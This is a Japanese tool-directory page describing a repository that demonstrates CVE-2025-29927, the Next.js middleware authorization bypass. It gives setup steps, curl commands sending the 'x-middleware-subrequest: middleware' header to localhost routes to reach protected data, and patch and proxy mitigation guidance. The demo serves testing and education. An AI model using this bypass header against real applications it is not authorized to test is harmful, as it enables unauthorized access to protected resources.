Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
claude-create-CVE-2025-29927 — CVE-2025-29927(Next.jsミドルウェアの認可バイパス)をテストおよび実証します。悪用テストスクリプトと通常アクセスのテストスクリプトに加え、修正ガイダンスが含まれています。 | Kitploit
ツール/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティ学習と教育
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

CVE-2025-29927(Next.jsミドルウェアの認可バイパス)をテストおよび実証します。悪用テストスクリプトと通常アクセスのテストスクリプトに加え、修正ガイダンスが含まれています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
1年前未レビュー

Next.js ミドルウェア脆弱性テスター (CVE-2025-29927)

このアプリケーションは、Next.js ミドルウェアの認可バイパス脆弱性 (CVE-2025-29927) を実証します。

脆弱性について

CVE-2025-29927 は、Next.js ミドルウェアにおける認可バイパス脆弱性です。特別に細工された HTTP ヘッダー (x-middleware-subrequest) を送信することで、攻撃者はミドルウェアに実装された認可チェックをバイパスし、保護されたリソースへのアクセスを取得する可能性があります。

セットアップ手順

  1. 依存関係をインストールします:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. 開発サーバーを起動します:

    root@kitploit:~
    npm run dev
    
  3. サーバーは http://localhost:3000 で開始されます。

脆弱性のテスト

通常アクセス(ブロックされるはず)

保護されたルートに通常どおりアクセスしてみてください:

root@kitploit:~
npm run test-normal

または

root@kitploit:~
curl -v http://localhost:3000/protected-data

ミドルウェアがアクセスをブロックするため、401 Unauthorized レスポンスが返るはずです。

脆弱性の悪用

エクスプロイトヘッダーを使って保護されたルートにアクセスしてみてください:

root@kitploit:~
npm run test-exploit

または

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

アプリケーションが脆弱な場合、保護されたデータとともに 200 OK レスポンスが返ります。

API ルートのテスト

通常アクセス(ブロックされるはず):

root@kitploit:~
curl -v http://localhost:3000/api/protected

エクスプロイト使用時:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

修正方法

この脆弱性を修正するには、以下を行ってください:

  1. Next.js をパッチ適用済みバージョンに更新します:

    • Next.js 15.x: 15.2.3 以降に更新
    • Next.js 14.x: 14.2.25 以降に更新
    • Next.js 13.x: 13.5.9 以降に更新
    • Next.js 12.x: 12.3.5 以降に更新
  2. 更新できない場合は、受信リクエストから x-middleware-subrequest ヘッダーを取り除くリバースプロキシ (Nginx や Cloudflare など) を導入します。

追加のテストコマンド

API ルートが脆弱かどうかをテストします:

root@kitploit:~
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

免責事項

このツールは教育およびセキュリティテストのみを目的として提供されます。ご自身の Next.js アプリケーションが脆弱かどうか、またパッチ適用が必要かどうかを確認するために使用してください。

ツールをダウンロード